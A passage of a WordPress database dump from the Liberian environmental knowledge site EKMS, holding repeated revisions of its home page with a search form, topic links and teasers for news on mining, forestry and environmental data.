href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 10:19:12','2019-11-27 10:19:12','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2830,1,'2019-11-27 10:22:31','2019-11-27 10:22:31','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 10:22:31','2019-11-27 10:22:31','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2831,1,'2019-11-27 10:27:07','2019-11-27 10:27:07','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 10:27:07','2019-11-27 10:27:07','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2832,1,'2019-11-27 10:27:30','2019-11-27 10:27:30','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 10:27:30','2019-11-27 10:27:30','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2838,1,'2019-11-27 12:51:04','2019-11-27 12:51:04','','gef_logo','','inherit','open','closed','','gef_logo','','','2019-11-27 12:51:04','2019-11-27 12:51:04','',0,'https://ekmsliberia.info/wp-content/uploads/2019/11/gef_logo.png',0,'attachment','image/png',0),(2849,1,'2019-11-27 16:20:39','2019-11-27 16:20:39','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-topic/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-topic/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-topics/\" role=\"button\">\n						Explore All Topics\n					</a>\n			<h2>Explore by Institution</h2>		\n		<p>Explore Government and partner Institutions that have direct linkages with environmental policies and development.</p>		\n			<a href=\"https://ekmsliberia.info/institutions-resources/\" role=\"button\">\n						Explore By Insitution\n					</a>\n			<h2>Explore by Document</h2>		\n		<p>Explore the EKMS Documents Database.</p>		\n			<a href=\"https://ekmsliberia.info/documents-database/\" role=\"button\">\n						Explore All Documents\n					</a>\n			<h1>Latest News & Blogs</h1>		\n	<a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic1-1.jpg\" alt=\"EPA, UNDP Built System To Hold Environmental Data\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/epa-undp-built-system-to-hold-environmental-data/\">EPA, UNDP Built System To Hold Environmental Data</a></h4>The Environmental Protection Agency of Liberia (EPA) and the United&hellip;\n	<a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/Illicit-mining.jpg\" alt=\"GIZ Partners With Ministry of Mines &amp; Energy to Develop Artisinal Mining Regulatory Roadmap\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/giz-partners-with-ministry-of-mines-energy-to-develop-artisinal-mining-regulatory-roadmap/\">GIZ Partners With Ministry of Mines & Energy to Develop...</a></h4>Recognizing the immense potential for the artisanal mining sector to&hellip;\n	<a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/FDA-MD.jpg\" alt=\"FDA to Build New Dock at Lake Piso\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-to-build-new-dock-at-lake-piso/\">FDA to Build New Dock at Lake Piso</a></h4>A joint team of FDA and GSA technicians working with&hellip;\n	<a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\"><img src=\"https://ekmsliberia.info/wp-content/uploads/2019/11/pic2.jpg\" alt=\"FDA Boss Wants Forest Rangers Armed\" width=\"1024\" height=\"530\"></a><a href=\"https://ekmsliberia.info/category/news/\">News</a><h4><a href=\"https://ekmsliberia.info/fda-boss-wants-forest-rangers-armed/\">FDA Boss Wants Forest Rangers Armed</a></h4>The Managing Director of the Forestry Development Authority (FDA) C.&hellip;\n			<a href=\"https://ekmsliberia.info/news-and-blogs/\" role=\"button\">\n						Read All News & Blogs\n					</a>\n									<h3>\n						Start Contributing to the EKMS					</h3>\n									Does your organization or institution work to complement the growing agenda on the Rio Conventions within Liberia? Are you interested in contributing to the knowledge resources by submitting a blog, news, case study, report or a publication?\n					<a href=\"https://ekmsliberia.info/contribute/\">\n						Join the team\n											</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-27 16:20:39','2019-11-27 16:20:39','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(2850,1,'2019-11-27 16:20:59','2019-11-27 16:20:59','<h2>Welcome to the EKMS</h2>		\n		<p>The EKMS provides free and open access to information from key government and partner institutions relating to the implementation of Rio Conventions. Explore the Knowledge Resources by Related Topics, Institutions and Documents.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:[&quot;document&quot;,&quot;institution&quot;,&quot;mea_resource&quot;,&quot;project_resource&quot;,&quot;related_topic&quot;],&quot;search_taxonomy&quot;:&quot;resource_category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n							<input type=\"hidden\" value=\"document,institution,mea_resource,project_resource,related_topic\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"Entire Resource\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>Entire Resource</option>\n	<option value=\"76\">Case Studies</option>\n	<option value=\"78\">Conventions</option>\n	<option value=\"79\">Factsheets</option>\n	<option value=\"161\">Guidelines</option>\n	<option value=\"82\">Leaflets</option>\n	<option value=\"84\">Newsletters</option>\n	<option value=\"85\">Policies</option>\n	<option value=\"209\">Project Document</option>\n	<option value=\"86\">Reports</option>\n	<option value=\"178\">Research</option>\n	<option value=\"88\">Strategy and Action Plans</option>\n	<option value=\"89\">Toolkits</option>\n</select>\n<button type=\"submit\"></button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Select a Topic</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-topic/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and 